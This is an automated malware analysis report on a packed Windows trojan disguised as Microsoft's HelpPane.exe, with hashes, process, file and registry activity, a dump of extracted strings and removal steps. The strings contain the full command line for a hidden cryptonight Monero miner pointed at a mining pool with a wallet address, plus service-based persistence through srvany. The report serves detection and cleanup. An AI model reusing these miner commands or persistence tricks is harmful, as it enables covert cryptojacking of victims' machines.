MD5: 7a14d10ebc50ad01af46c1e3a2bbf8ba
SHA1: 285cdd6ad931a6a1e4a1ed73e5b792f69de5e0d0
SHA256: 739c1699ffb84f71aa58530265b59cc329fd202352c5fb3a1be456e48f096cbf
SSDeep: 98304:UDoMNXOxHjiHmU7AxwWajvOoykazOIz70i:oeBE7Eaj0k8f
Size: 3788800 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company:
Created at: 2016-03-29 07:32:31
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1004
srvany.exe:1664

The Trojan injects its code into the following process(es):

Systmsi.exe:896

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Systmsi.exe (7972 bytes)
%System%\srvany.exe (8 bytes)

Registry activity

The process %original file name%.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 3B 34 6B E6 75 C5 B1 4C 3F A0 24 76 0B BD D8"

[HKLM\System\CurrentControlSet\Services\Mmservesi\Parameters]
"AppDirectory" = "c:\windows\"
"Application" = "c:\windows\svchosi.exe"

The process srvany.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC 95 5E DE 10 C3 6E 6C F7 A7 7D E3 D1 3B BD D6"

The process Systmsi.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 8D B4 24 E9 7F 10 35 DC 3D 57 58 F2 4D D4 2F"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: HelpPane.exe
Internal Name: HelpPane.exe
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: Microsoft Help and Support
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

advapi32.dll

Advapi32.dll

Kernel32.dll

kernel32.dll

ADVAPI32.DLL

RegOpenKeyExA

RegCreateKeyExA

RegCloseKey

GetServiceKeyNameA

Systmsi.exe

Systmsi.exe -a cryptonight -o stratum tcp://xmr.crypto-pool.fr:3333 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1

Systmssi.exe

Systmssi.exe -a cryptonight -o stratum tcp://xmr.crypto-pool.fr:3333 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1

.pdata

@.tls

.vmp0

.vmp1

.reloc

@.rsrc

Ap.JPQ

.RDpd

bl.yr%$k

|z%CM

Delk.Zj

vL]%f

t%6Uj)

aWX.oF

T.Lb`gdi

n.bR1

.Kfr:

)%cl-

.ziPgw

Nj.mK

.lrY(

[I%uK

"i%fW

xr.RL

k[.na

.Us=31

udPB

%DyIT

D5.pi

.jiE-

.kMrZ*6~

]T>0}%F

.TEgD

h.qus0

-!.SU

-`.cN@

hJ.dFW

.jMvo

.hY(f

oj.NXg

o%S '

z:%cIC

;y..Zi"K

WP{m.topE

.kcT[

dy).pg

C.Apg

i%Do.

I%d)m

mg.un4`

Kn.IV

$l:%X

I%u=i

MTa.zi

.zif`

yn,J%C

%xKn1(c

gx`%c

m.XhY

5tX&%c

.dNnY

v.hmf

eB.jX

R.ta!]W

.hp%*

kwo.gD

wq-Z}

.hCxip

hfTp

.WHj&

FL.Zn

X.zh:^

(.%cR

G.qMK

,.zXfU

%XV<oA

Rv.cOQKM

vpþ

SkIt%C

/K%xB#S

|8`8%d

KERNEL32.dll

Zic%f

/.BBE

Z8A.Vy@H

H.HOB

WS2_32.dll

EnumChildWindows

lW.my

,5".01 8

9:T.Yu

.IH92

^Duser32.dll

USER32.dll

.lWU*)/

ecb_Ã

]Fd.TC$@

%d`#25

.%SJ'6x

4E%D:

.eDRk

X8%D@B$ $

 z%Xz

D .Bj

^_t%u#

10\.ga7

Mb9_9.ap

t{%d?h 

#..kS1

).saHc

1.AFu

'nl%f

`X.bf

~'_%c

C^.ar

(ýn

~%C>I

c.Zi~

RO}.gB"05

T~(%f

I~.VC

#.Im%"a

yd.KI

sb$i.Tik]

WXR.Jc

n`%UI

%dXqE

G.Rtr

.Zbh|

>?%Xf

, *10/.5

9.eRY

.qx )

'?yADVAPI32.dll

E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

d`.OE

dlo%S

11D1

434~4&585

3 3$3(3,30343

7|7r7

7|7R7a7

9 9$9(9,90949~9

<"=1=9=?=

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

1 1$1(1,1014181<1

; ;$;(;,;

8(8,80848

0S091K1h1

0 0$0(0,0

8g8%9U:

6Ÿ9>;

5%6x6,7

.DN4s

}4>%D

.pF`S

t%D[|sd

&.dD:

%SvU~

%Cm<#e

%F%2H

%Dm[p

9.hLv

.gVi^

7'.bb7

Ac-#

V=WC%ub

S\Z%2U

 N%D{

H%uz4

y*T.Hz

#{<%S

}f%uJz

y;%c 6#

%7.cF#r

[.NE,

Ý3w>

d}O.Mw

U?.ld

#.%ui

[.sMx

= U%D=6c

-d4}pA

2.ZYF

~v%xQ

r.pg(|

\%f#"

!m%U_

%fIMd9b\

| %f(

xC&\%c$Z

-Qo%s

^.miIa

?%FPz

m`%s;!

)%u_j

Ks?^%f

x %F;$

{-#3/!;#

G\.hgR

%u-1v#

c.MgK

%Sw0\

%u@9m

`;a?%2s

u9-%urE

B.Tx"Y

{.tJ?

f>g.zc

BC;T.uVw

}%xH[

rp%D[/

T %uc

OhY %X|C

!5}2 6}1

r{.VW

81.rz,

,.EtL

.mk%c

NR%xn

%|%CIk

fx-,3_%X

%dww@a

%SOc5i48

,&.PT

2N%xMs

=I.ZJ

M-Qr} 1

t.Ab_

%D/,d

a.GrQ9,Y

D.bf)

x7=.ZT

9d%fI5

o.oH&

.gNiX

Y,.jH

!.ux;

.dRi!

!z?.ic

$lyr.tz

O _]j

.Lm> $

s{\>3.Lm=

0\!.Um 

.).Be

%T.Qa

CJ1d."%s

Jþ}

z-.|.Qt3 v

\.Nn,

.OzA]

.PBA@

}.bMD

pTx%xV

Wtuser32.dll

d`.dy{

]%sv;

P3.xE

.ZuWm

H.iq~

%x#zP

ADVAPI32.dll

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

svchosi.exe

c:\windows\svchosi.exe

`.data

OS2SSService-%d

OS2.EXE /S /P

OS2.EXE /S /P C:\OS2\PMSHELL.EXE /C C:\OS2\PMSHELL.EXE

srvany.pdb

msvcrt.dll

C:\Windows\SysWOW64\srvany.exe

%WinDir%\SysWOW64\srvany.exe

C:\Windows\system32\srvany.exe

C:\Windows\System32\srvany.exe

RegDisableReflectionKey

RegEnableReflectionKey

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

user32.dll

GetProcessHeap

WinExec

GetWindowsDirectoryA

GetKeyState

GetViewportOrgEx

GDI32.dll

WINMM.dll

WINSPOOL.DRV

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

==5444455=>\

:@44333000- 

}heXE

jjk%xxy

jjk`jjk%xxy

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

(*.*)

Microsoft Help and Support

6.1.7600.16385 (win7_rtm.090713-1255)

HelpPane.exe

Windows

Operating System

6.1.7600.16385

Systmsi.exe_896:

.text

`.rdata

@.data

.vmp0

.vmp1

.reloc

@.rsrc

d`.OE

dlo%S

11D1

434~4&585

3 3$3(3,30343

7|7r7

7|7R7a7

9 9$9(9,90949~9

<"=1=9=?=

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

1 1$1(1,1014181<1

; ;$;(;,;

8(8,80848

0S091K1h1

0 0$0(0,0

8g8%9U:

6Ÿ9>;

5%6x6,7

USER32.dll

.DN4s

}4>%D

WS2_32.dll

.pF`S

t%D[|sd

KERNEL32.dll

&.dD:

%SvU~

%Cm<#e

%F%2H

%Dm[p

9.hLv

.gVi^

7'.bb7

Ac-#

V=WC%ub

S\Z%2U

 N%D{

H%uz4

y*T.Hz

#{<%S

}f%uJz

y;%c 6#

%7.cF#r

[.NE,

Ý3w>

d}O.Mw

U?.ld

#.%ui

[.sMx

= U%D=6c

-d4}pA

2.ZYF

~v%xQ

r.pg(|

\%f#"

!m%U_

%fIMd9b\

| %f(

xC&\%c$Z

-Qo%s

^.miIa

?%FPz

m`%s;!

)%u_j

Ks?^%f

x %F;$

{-#3/!;#

G\.hgR

%u-1v#

c.MgK

%Sw0\

%u@9m

`;a?%2s

u9-%urE

B.Tx"Y

{.tJ?

f>g.zc

BC;T.uVw

}%xH[

rp%D[/

T %uc

OhY %X|C

!5}2 6}1

r{.VW

81.rz,

,.EtL

.mk%c

NR%xn

%|%CIk

fx-,3_%X

%dww@a

%SOc5i48

,&.PT

2N%xMs

=I.ZJ

M-Qr} 1

t.Ab_

%D/,d

a.GrQ9,Y

D.bf)

x7=.ZT

9d%fI5

o.oH&

.gNiX

Y,.jH

!.ux;

.dRi!

!z?.ic

$lyr.tz

O _]j

.Lm> $

s{\>3.Lm=

0\!.Um 

.).Be

%T.Qa

CJ1d."%s

Jþ}

z-.|.Qt3 v

\.Nn,

.OzA]

.PBA@

}.bMD

pTx%xV

Wtuser32.dll

d`.dy{

]%sv;

P3.xE

.ZuWm

H.iq~

%x#zP

ADVAPI32.dll

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

Systmsi.exe_896_rwx_006D6000_00001000:

}%xH[

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1004
   srvany.exe:1664
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\Systmsi.exe (7972 bytes)
   %System%\srvany.exe (8 bytes)

4. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.